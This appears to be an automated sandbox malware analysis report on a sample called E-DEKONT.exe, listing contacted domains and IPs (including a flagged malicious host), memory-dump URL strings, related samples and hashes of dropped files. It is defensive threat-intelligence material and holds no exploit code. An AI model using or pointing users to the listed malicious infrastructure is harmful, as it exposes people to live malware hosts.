                  http://dbxo1.shop/db1/index.php~ | 0% | Avira URL Cloud | safe |
                  http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe |
                  https://aapancart.com/DOHx | 0% | Avira URL Cloud | safe |
                  http://dbxo1.shop/db1/index.phpe | 0% | Avira URL Cloud | safe |
                  https://aapancart.com/qO | 0% | Avira URL Cloud | safe |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  aapancart.com | 103.14.99.114 | true | false | | unknown
                  dbxo1.shop | 104.21.44.194 | true | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  http://dbxo1.shop/db1/index.php | true | Avira URL Cloud: safe | unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.mozilla.com/en-US/blocklist/mozglue.dll.4.drfalse
                      high
                      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdE-DEKONT.exe, 00000004.00000001.108602069162.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://dbxo1.shop/db1/index.phplE-DEKONT.exe, 00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://dbxo1.shop/db1/index.phpME-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.thawte.com/ThawteTimestampingCA.crl0E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 
00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpfalse
                        high
                        http://dbxo1.shop/E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ocsp.thawte.com0E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 
00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.mozilla.com0E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 
00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdE-DEKONT.exe, 00000004.00000001.108602069162.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://nsis.sf.net/NSIS_ErrorErrorE-DEKONT.exefalse
                          high
                          http://dbxo1.shop/db1/index.php~E-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968805939.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108969478234.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDE-DEKONT.exe, 00000004.00000001.108602358770.0000000000626000.00000008.00000001.01000000.00000005.sdmpfalse
                            high
                            http://www.gopher.ftp://ftp.E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://dbxo1.shop/db1/index.phpeE-DEKONT.exe, 00000004.00000003.108967585571.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963689288.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966284437.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108880828920.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108965615744.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108968098553.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108966999405.0000000001A72000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://aapancart.com/DOHxE-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://aapancart.com/qOE-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
103.14.99.114 | aapancart.com | Singapore | 58641 | TRUNKOZ-INTrunkozTechnologiesPvtLtdIN | false
104.21.44.194 | dbxo1.shop | United States | 13335 | CLOUDFLARENETUS | true
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:755881
                            Start date and time:2022-11-29 09:17:55 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 39s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:E-DEKONT.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                            Run name:Suspected Instruction Hammering
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.phis.troj.spyw.evad.winEXE@8/55@2/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 36.6% (good quality ratio 36%)
                            • Quality average: 87%
                            • Quality standard deviation: 21.2%
                            HCA Information:
                            • Successful, ratio: 95%
                            • Number of executed functions: 60
                            • Number of non-executed functions: 55
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
                            • Excluded IPs from analysis (whitelisted): 40.126.31.71, 40.126.31.69, 20.190.159.71, 20.190.159.75, 20.190.159.4, 20.190.159.23, 20.190.159.64, 40.126.31.67, 51.124.57.242
                            • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, prda.aadg.msidentity.com, login.live.com, tile-service.weather.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            No simulations
Match | Associated Sample Name / URL | Detection | Context
103.14.99.114 | Swift Mesaj#U0131#09971.exe | malicious |
103.14.99.114 | E-DEKONT.exe | malicious |
103.14.99.114 | SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe | malicious |
104.21.44.194 | E-DEKONT.exe | malicious | dbxo1.shop/db1/index.php
104.21.44.194 | SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe | malicious | dbxo1.shop/db1/index.php

Match | Associated Sample Name / URL | Detection | Context
dbxo1.shop | Swift Mesaj#U0131#09971.exe | malicious | 172.67.203.65
dbxo1.shop | E-DEKONT.exe | malicious | 104.21.44.194
dbxo1.shop | SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe | malicious | 104.21.44.194
aapancart.com | Swift Mesaj#U0131#09971.exe | malicious | 103.14.99.114
aapancart.com | E-DEKONT.exe | malicious | 103.14.99.114
aapancart.com | SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe | malicious | 103.14.99.114
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 22, 1st free page 7, free pages 2, cookie 0x10, schema 4, UTF-8, version-valid-for 3
                                                                          Category:dropped
                                                                          Size (bytes):45056
                                                                          Entropy (8bit):0.7853305971874845
                                                                          Encrypted:false
                                                                          SSDEEP:48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
                                                                          MD5:00C036C61F625BF9D25362B9BE24ADEB
                                                                          SHA1:6738C3D037E4A2E9F41B1398BA88E5771532F593
                                                                          SHA-256:0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
                                                                          SHA-512:711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18744
                                                                          Entropy (8bit):7.080160932980843
                                                                          Encrypted:false
                                                                          SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                                                                          MD5:502263C56F931DF8440D7FD2FA7B7C00
                                                                          SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                                                                          SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                                                                          SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
• Filename: t8B2Qcl0nS.exe, Detection: malicious
• Filename: PO No. 3200005919.exe, Detection: malicious
• Filename: Swift Mesaj#U0131#09971.exe, Detection: malicious
• Filename: E-DEKONT.exe, Detection: malicious
• Filename: VAN66789.exe, Detection: malicious
• Filename: e555fe3baa7d282f00cdaccf6ce2820d9fdc6556f8f24.exe, Detection: malicious
• Filename: MhQTqiCvm1.exe, Detection: malicious
• Filename: PROFORMA-418340-2022.exe, Detection: malicious
• Filename: SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.BotX-gen.30874.3243.exe, Detection: malicious
• Filename: Fedex No71502.exe, Detection: malicious
• Filename: gunzipped.exe, Detection: malicious
• Filename: PO110859600.js, Detection: malicious
• Filename: cH9kNQjk7C.jar, Detection: malicious
• Filename: PO-11085960.js, Detection: malicious
• Filename: 879-5160.js, Detection: malicious
• Filename: Orderlist.jar, Detection: malicious
• Filename: e-dekont.pdf.exe, Detection: malicious
• Filename: Dekont.exe, Detection: malicious
• Filename: e-dekont.pdf.exe, Detection: malicious
                                                                          Reputation:high, very likely benign file
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.093995452106596
                                                                          Encrypted:false
                                                                          SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                                                                          MD5:CB978304B79EF53962408C611DFB20F5
                                                                          SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                                                                          SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                                                                          SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.1028816880814265
                                                                          Encrypted:false
                                                                          SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                                                                          MD5:88FF191FD8648099592ED28EE6C442A5
                                                                          SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                                                                          SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                                                                          SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.126358371711227
                                                                          Encrypted:false
                                                                          SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                                                                          MD5:6D778E83F74A4C7FE4C077DC279F6867
                                                                          SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                                                                          SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                                                                          SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):21816
                                                                          Entropy (8bit):7.014255619395433
                                                                          Encrypted:false
                                                                          SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                                                                          MD5:94AE25C7A5497CA0BE6882A00644CA64
                                                                          SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                                                                          SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                                                                          SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.112057846012794
                                                                          Encrypted:false
                                                                          SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                                                          MD5:E2F648AE40D234A3892E1455B4DBBE05
                                                                          SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                                                          SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                                                          SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.166618249693435
                                                                          Encrypted:false
                                                                          SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                                                          MD5:E479444BDD4AE4577FD32314A68F5D28
                                                                          SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                                                                          SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                                                          SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.1117101479630005
                                                                          Encrypted:false
                                                                          SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                                                          MD5:6DB54065B33861967B491DD1C8FD8595
                                                                          SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                                                                          SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                                                          SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.174986589968396
                                                                          Encrypted:false
                                                                          SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                                                          MD5:2EA3901D7B50BF6071EC8732371B821C
                                                                          SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                                                          SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                                                          SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):17856
                                                                          Entropy (8bit):7.076803035880586
                                                                          Encrypted:false
                                                                          SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                                                          MD5:D97A1CB141C6806F0101A5ED2673A63D
                                                                          SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                                                          SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                                                          SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18744
                                                                          Entropy (8bit):7.131154779640255
                                                                          Encrypted:false
                                                                          SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                                                          MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                                                          SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                                                          SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                                                          SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                                                          Malicious:false
                                                                          Antivirus:
